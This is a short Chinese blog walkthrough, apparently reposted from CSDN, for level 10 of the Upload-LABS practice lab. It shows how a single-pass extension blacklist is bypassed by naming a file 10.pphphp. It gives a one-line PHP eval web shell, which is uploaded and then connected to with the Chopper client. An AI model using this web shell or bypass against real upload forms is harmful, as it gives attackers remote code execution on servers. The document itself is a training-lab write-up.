Upload LABS Pass-10

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单

准备一个 10.pphphp 文件 , 内容为一句话木马

<?php eval($_POST[-7]);?>

上传 10.pphphp 文件

img

 后端黑名单中包含 'php' , 会将php替换为空 , 但只替换一次 , 替换后的文件名为 10.php , 仍然可以正常使用

右键 复制图片链接地址 , 并使用菜刀链接

img

 img

 链接成功

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118436258
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复